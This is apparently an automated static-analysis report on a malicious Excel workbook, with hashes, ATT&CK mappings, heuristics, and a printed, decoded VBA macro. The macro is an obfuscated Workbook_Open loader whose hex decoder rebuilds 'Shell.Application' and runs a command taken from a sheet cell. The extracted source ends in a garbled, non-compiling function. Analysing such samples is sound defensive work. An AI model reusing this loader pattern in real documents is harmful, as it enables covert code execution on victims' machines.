Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1b73b2d4b49dc61…

MALICIOUS

Office (OLE)

214.0 KB Created: 2018-09-04 13:21:48 Authoring application: Microsoft Excel First seen: 2019-04-17
MD5: 98493cbb6c54be116197011aa4023f12 SHA-1: 69975e45933e8e1f2f1f1b930c4fe3b28d33579f SHA-256: f1b73b2d4b49dc61abe34c2bcc96464392b3e137927d4354c1548921e0ebeb74
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

This Excel file contains obfuscated VBA macros, including a Workbook_Open event, designed to execute code. The macro uses CreateObject and CallByName to dynamically execute a payload. The HTX_ function appears to be a custom decoder for strings, and it decodes to 'Shell.Application'. The CallByName function is then used to execute a method on this object, likely to download and run a second-stage payload from a URL that is not directly visible in the provided script but is implied by the execution of 'Shell.Application'.

Heuristics 7

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 228 bytes
SHA-256: 962aaf1d57f0a7207e98bd37b3a4cfa339dc6a87bd287090a5d69186204feb4a
Preview script
First 1,000 lines of the extracted script
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Top
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 927 bytes
SHA-256: f3c8b7683b61548c310f87d8ab2dc5897cc4de3e6825715284dfb9cbbf350869
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function HTX_(ByVal RGT_ As String)
Dim ML_(2) As Integer: ML_(0) = Val("38"): ML_(1) = Val("72"): Dim MO_ As String: Dim I_ As Long: For I_ = 1 To Len(RGT_) Step 2: MO_ = MO_ & Chr(Val(Chr(ML_(0)) & Chr(ML_(1)) & Mid(RGT_, I_, 2)) - 26): Next: HTX_ = MO_
End Function
Sub Workbook_Open()
CallByName CreateObject(HTX_("716D7D8C838A8E486D827F8686")), HTX_("6C8F88"), VbMethod, HTX_(ThisWorkbook.Sheets("Tope").Range("G135").Value), 0, True
End Sub
Private Function UIWU_() As String
Dim For  = 34 To 77:UBTSOD_(aLPBXQCNCVN_ & QDBDSG_(34, 4), 11)):Next i:UIWU_ = AMSWLJQOEQ_:
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.